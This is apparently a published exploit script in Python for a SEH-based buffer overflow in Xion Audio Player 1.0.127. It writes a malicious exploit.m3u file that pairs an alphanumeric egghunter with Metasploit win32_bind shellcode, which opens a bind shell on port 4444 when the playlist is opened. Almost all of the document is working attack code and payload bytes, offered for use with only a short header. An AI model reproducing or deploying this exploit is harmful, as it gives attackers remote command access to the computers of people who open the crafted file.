# Exploit Title: Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability # Date: 11/23/2010 # Author: 0v3r # Software Link: http://www.r2.com.au/downloads/files/xion_v1.0b127.exe # Version: 1.0.127 # Tested on: Windows XP SP3 EN # CVE: N/A
#!/usr/bin/python
# encoded with alpha3 encoder by skylined egghunter = ("PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAI" "AJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO" "0B0R1ZKR0X8MNNOLKU0Z2TJO6X2W00002T4KJZ6O2U9Z6O2U9WKO9WKPA")
#win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com shellcode= ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x37\x49\x49" "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x47" "\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41\x57\x42\x32\x42\x41\x32" "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x4d\x39\x49\x6c\x33" "\x5a\x48\x6b\x42\x6d\x38\x68\x5a\x59\x6b\x4f\x49\x6f\x4b\x4f\x63" "\x50\x6c\x4b\x30\x6c\x64\x64\x64\x64\x6c\x4b\x50\x45\x67\x4c\x4c" "\x4b\x51\x6c\x37\x75\x61\x68\x76\x61\x58\x6f\x4e\x6b\x52\x6f\x72" "\x38\x4c\x4b\x73\x6f\x45\x70\x43\x31\x68\x6b\x31\x59\x4c\x4b\x70" "\x34\x4c\x4b\x57\x71\x7a\x4e\x34\x71\x4f\x30\x6e\x79\x6c\x6c\x6b" "\x34\x6f\x30\x43\x44\x33\x37\x6b\x71\x69\x5a\x76\x6d\x53\x31\x49" "\x52\x5a\x4b\x4c\x34\x45\x6b\x52\x74\x41\x34\x54\x68\x50\x75\x38" "\x65\x6c\x4b\x63\x6f\x54\x64\x53\x31\x38\x6b\x43\x56\x4e\x6b\x36" "\x6c\x72\x6b\x4e\x6b\x53\x6f\x75\x4c\x34\x41\x78\x6b\x64\x43\x64" "\x6c\x6e\x6b\x4b\x39\x50\x6c\x41\x34\x65\x4c\x52\x41\x7a\x63\x64" "\x71\x69\x4b\x51\x74\x6e\x6b\x71\x53\x66\x50\x4c\x4b\x77\x30\x74" "\x4c\x6c\x4b\x74\x30\x45\x4c\x4c\x6d\x6e\x6b\x43\x70\x33\x38\x73" "\x6e\x53\x58\x4c\x4e\x50\x4e\x64\x4e\x38\x6c\x46\x30\x6b\x4f\x4e" "\x36\x65\x36\x61\x43\x63\x56\x33\x58\x36\x53\x34\x72\x71\x78\x44" "\x37\x34\x33\x46\x52\x41\x4f\x42\x74\x6b\x4f\x48\x50\x65\x38\x5a" "\x6b\x7a\x4d\x39\x6c\x45\x6b\x52\x70\x4b\x4f\x6a\x76\x71\x4f\x4e" "\x69\x6d\x35\x50\x66\x6d\x51\x7a\x4d\x63\x38\x33\x32\x32\x75\x50" "\x6a\x43\x32\x79\x6f\x38\x50\x45\x38\x68\x59\x73\x39\x4c\x35\x4e" "\x4d\x56\x37\x6b\x4f\x6a\x76\x76\x33\x30\x53\x71\x43\x76\x33\x71" "\x43\x41\x53\x76\x33\x73\x73\x71\x43\x6b\x4f\x4e\x30\x71\x76\x31" "\x78\x37\x61\x41\x4c\x70\x66\x46\x33\x4b\x39\x48\x61\x6d\x45\x70" "\x68\x39\x34\x57\x6a\x30\x70\x4b\x77\x72\x77\x6b\x4f\x78\x56\x31" "\x7a\x46\x70\x61\x41\x63\x65\x6b\x4f\x4e\x30\x35\x38\x6c\x64\x6c" "\x6d\x36\x4e\x6d\x39\x46\x37\x6b\x4f\x5a\x76\x42\x73\x71\x45\x59" "\x6f\x68\x50\x75\x38\x6b\x55\x37\x39\x6c\x46\x67\x39\x46\x37\x69" "\x6f\x4a\x76\x70\x50\x73\x64\x46\x34\x61\x45\x6b\x4f\x78\x50\x6d" "\x43\x42\x48\x6b\x57\x54\x39\x6b\x76\x50\x79\x50\x57\x6b\x4f\x48" "\x56\x70\x55\x49\x6f\x6a\x70\x45\x36\x41\x7a\x73\x54\x75\x36\x62" "\x48\x65\x33\x30\x6d\x6e\x69\x7a\x45\x30\x6a\x52\x70\x63\x69\x75" "\x79\x48\x4c\x4f\x79\x6d\x37\x71\x7a\x57\x34\x6e\x69\x58\x62\x67" "\x41\x6b\x70\x69\x63\x6e\x4a\x4b\x4e\x77\x32\x66\x4d\x6b\x4e\x41" "\x52\x66\x4c\x5a\x33\x6c\x4d\x51\x6a\x66\x58\x6e\x4b\x4c\x6b\x4e" "\x4b\x42\x48\x70\x72\x69\x6e\x78\x33\x67\x66\x6b\x4f\x70\x75\x67" "\x34\x4b\x4f\x4e\x36\x33\x6b\x70\x57\x56\x32\x50\x51\x46\x31\x46" "\x31\x41\x7a\x54\x41\x30\x51\x41\x41\x66\x35\x30\x51\x69\x6f\x4e" "\x30\x50\x68\x6c\x6d\x5a\x79\x77\x75\x4a\x6e\x52\x73\x39\x6f\x58" "\x56\x30\x6a\x4b\x4f\x6b\x4f\x50\x37\x59\x6f\x6e\x30\x6c\x4b\x36" "\x37\x79\x6c\x6d\x53\x78\x44\x31\x74\x4b\x4f\x6b\x66\x30\x52\x69" "\x6f\x6e\x30\x65\x38\x6a\x50\x6e\x6a\x76\x64\x73\x6f\x63\x63\x49" "\x6f\x4b\x66\x69\x6f\x4e\x30\x47")
junk = "A" * 221
nseh = "\x61" #popad nseh += "\x6e" #nop/align
seh = "\x7b\x41" # POP POP RET
#fix eax to point to the egghunter prepare = "\x6e" #nop/align prepare += "\x05\x14\x11" #add eax,0x11001400 prepare += "\x6e" #nop/align prepare += "\x2d\x13\x11" #sub eax,0x11001300 prepare += "\x6e" #nop/alignn
#jump to eax jump = "\x50" #push eax jump +="\x6e" #nop/align jump += "\xc3" #retn
#align buffer to hit the egghunter align = "D" * 112
#few junk before shellcode preshell = "D" * 500
#the egghunters tag egg = "w00tw00t"
#few more junk after our shellcode #I noticed that the bigger the buffer the more reliable the exploit postshell= "E" * (12000 - len(junk + nseh + seh + preshell + jump + align + egghunter + egg + preshell + shellcode ))
#the final buffer buff = junk + nseh + seh + prepare + jump + align + egghunter + preshell + egg + shellcode + postshell
try: f = open("exploit.m3u",'w') f.write(buff) f.close() print "\n" print "\t-----------------------------------------------------------------" print "\t| Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability |" print "\t-----------------------------------------------------------------" print "\n" print "\t- File successfully created..." print "\t- To run exploit open the file exploit.m3u with Xion Audio Player...\n" except: print "\t-Oooops! Can't write file ...\n"
|